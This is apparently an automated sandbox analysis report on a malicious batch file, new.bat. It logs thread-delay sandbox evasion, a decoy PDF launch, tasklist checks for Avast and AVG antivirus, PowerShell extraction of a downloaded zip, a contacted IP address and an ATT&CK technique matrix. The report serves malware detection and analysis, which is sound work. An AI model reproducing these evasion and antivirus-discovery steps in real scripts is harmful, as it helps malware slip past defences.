Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 6055Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5321Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4497Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5152
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4592
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7188Thread sleep count: 5321 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7192Thread sleep count: 4497 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7232Thread sleep time: -14757395258967632s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7256Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7672Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3520Thread sleep count: 5152 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3520Thread sleep count: 4592 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3652Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: 3.8.html.17.drBinary or memory string: for better performance. On Windows Subsystem for Linux and QEMU User
Source: svchost.exe, 0000000A.00000002.3027052139.000001EF0DA2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.3029346106.000001EF13255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: powershell.exe, 00000008.00000002.2435985047.0000025749990000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\BPMLNOBVSB.pdf"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq AvastUI.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "AvastUI.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "avgui.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "AvastUI.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { Expand-Archive -Path 'C:\Users\user\Downloads\downloaded.zip' -DestinationPath 'C:\Users\user\Downloads\Extracted' -Force } catch { exit 1 }"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: find.exe, 00000007.00000002.1781567662.000001C15509B000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000007.00000002.1781657909.000001C1551D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgui.exe
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts1
Windows Management Instrumentation
1
Scripting
11
Process Injection
11
Masquerading
OS Credential Dumping21
Security Software Discovery
1
Taint Shared Content
Data from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell
1
DLL Side-Loading
1
DLL Side-Loading
31
Virtualization/Sandbox Evasion
LSASS Memory2
Process Discovery
Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
Process Injection
Security Account Manager31
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS1
Application Window Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials22
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1554412 Sample: new.bat Startdate: 12/11/2024 Architecture: WINDOWS Score: 72 43 Malicious sample detected (through community Yara rule) 2->43 45 Antivirus detection for URL or domain 2->45 47 AI detected suspicious sample 2->47 8 cmd.exe 3 2 2->8         started        11 svchost.exe 1 1 2->11         started        process3 dnsIp4 49 Suspicious powershell command line found 8->49 14 powershell.exe 1002 8->14         started        18 powershell.exe 14 17 8->18         started        21 Acrobat.exe 79 8->21         started        23 6 other processes 8->23 41 127.0.0.1 unknown unknown 11->41 signatures5 process6 dnsIp7 29 C:\Users\user\Downloads\...\__main__.py, Python 14->29 dropped 31 C:\Users\user\Downloads\...\structs.py, Python 14->31 dropped 33 C:\Users\user\Downloads\...\resolvers.py, Python 14->33 dropped 37 386 other files (1 malicious) 14->37 dropped 51 Infects executable files (exe, dll, sys, html) 14->51 53 Loading BitLocker PowerShell Module 14->53 39 154.216.16.111 SKHT-ASShenzhenKatherineHengTechnologyInformationCo Seychelles 18->39 35 C:\Users\user\Downloads\downloaded.zip, Zip 18->35 dropped 25 AcroCEF.exe 107 21->25         started        file8 signatures9 process10 process11 27 AcroCEF.exe 2 25->27         started       

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
new.bat8%ReversingLabs
SourceDetectionScannerLabelLink
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\_aix_support.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\_collections_abc.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\_compression.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\_markupbase.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\_osx_support.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\_py_abc.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\_pydatetime.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\_pyio.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\_pylong.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\_sitebuiltins.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\_strptime.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\_threading_local.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\_weakrefset.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\abc.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\aifc.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\argparse.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\ast.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\__init__.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\__main__.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\base_events.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\base_futures.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\base_subprocess.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\base_tasks.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\events.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\exceptions.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\format_helpers.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\futures.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\locks.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\log.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\mixins.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\proactor_events.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\protocols.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\queues.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\runners.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\selector_events.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\sslproto.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\staggered.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\streams.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\subprocess.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\taskgroups.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\tasks.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\threads.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\timeouts.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\transports.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\trsock.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\unix_events.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\windows_events.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\asyncio\windows_utils.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\base64.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\bdb.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\bisect.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\bz2.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\cProfile.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\calendar.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\cgi.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\cgitb.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\chunk.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\cmd.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\code.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\codecs.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\collections\__init__.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\collections\abc.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\colorsys.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\compileall.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\concurrent\futures\__init__.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\concurrent\futures\_base.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\concurrent\futures\process.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\concurrent\futures\thread.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\configparser.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\contextlib.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\contextvars.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\copy.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\copyreg.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\crypt.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\csv.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\ctypes\__init__.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\ctypes\_aix.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\ctypes\_endian.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\ctypes\macholib\__init__.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\ctypes\macholib\dyld.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\ctypes\macholib\dylib.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\ctypes\macholib\fetch_macholib0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\ctypes\macholib\framework.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\ctypes\util.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\curses\__init__.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\curses\ascii.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\curses\panel.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\curses\textpad.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\dataclasses.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\dbm\__init__.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\dbm\dumb.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\dbm\gnu.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\dbm\ndbm.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\difflib.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\dis.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\doctest.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\email\_encoded_words.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\email\_header_value_parser.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\email\_policybase.py0%ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\email\base64mime.py0%ReversingLabs
No Antivirus matches
No Antivirus matches
